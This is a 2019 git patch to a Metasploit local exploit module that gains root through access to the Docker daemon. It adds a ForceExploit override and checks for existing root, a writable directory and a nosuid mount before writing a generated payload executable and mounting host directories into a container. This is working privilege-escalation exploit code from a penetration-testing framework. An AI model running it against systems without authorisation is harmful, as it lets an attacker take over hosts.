From 20fd6b6134838fcaa2a2f31f0092c22e73c34b76 Mon Sep 17 00:00:00 2001
From: Brendan Coles <bcoles@gmail.com>
Date: Fri, 11 Jan 2019 22:41:14 +0000
Subject: [PATCH] Add check for writable and nosuid WritableDir

---
 .../docker_daemon_privilege_escalation.rb     | 31 +++++++++++++++++--
 1 file changed, 29 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/linux/local/docker_daemon_privilege_escalation.rb b/modules/exploits/linux/local/docker_daemon_privilege_escalation.rb
index 59ed4e51f8..2b3b626a1b 100644
--- a/modules/exploits/linux/local/docker_daemon_privilege_escalation.rb
+++ b/modules/exploits/linux/local/docker_daemon_privilege_escalation.rb
@@ -29,12 +29,18 @@ class MetasploitModule < Msf::Exploit::Local
       }
     ))
     register_advanced_options([
+      OptBool.new('ForceExploit',  [false, 'Override check result', false]),
       OptString.new("WritableDir", [true, "A directory where we can write files", "/tmp"])
     ])
   end
 
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
   def check
     if cmd_exec('docker ps && echo true') =~ /true$/
+      print_good("Docker daemon is accessible.")
       Exploit::CheckCode::Vulnerable
     else
       print_error("Failed to access Docker daemon.")
@@ -43,8 +49,29 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def exploit
+    unless check == CheckCode::Vulnerable
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    if is_root?
+      unless datastore['ForceExploit']
+        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
+      end
+    end
+
+    unless writable? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
+    if nosuid? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is mounted nosuid"
+    end
+
     pl = generate_payload_exe
-    exe_path = "#{datastore['WritableDir']}/#{rand_text_alpha(6 + rand(5))}"
+    exe_path = "#{base_dir}/#{rand_text_alpha(6..11)}"
     print_status("Writing payload executable to '#{exe_path}'")
 
     write_file(exe_path, pl)
@@ -59,7 +86,7 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def shell_script(exploit_path)
-    deps = %w(/bin /lib /lib64 /etc /usr /opt) + [datastore['WritableDir']]
+    deps = %w(/bin /lib /lib64 /etc /usr /opt) + [base_dir]
     dep_options = deps.uniq.map { |dep| "-v #{dep}:#{dep}" }.join(" ")
 
     %Q{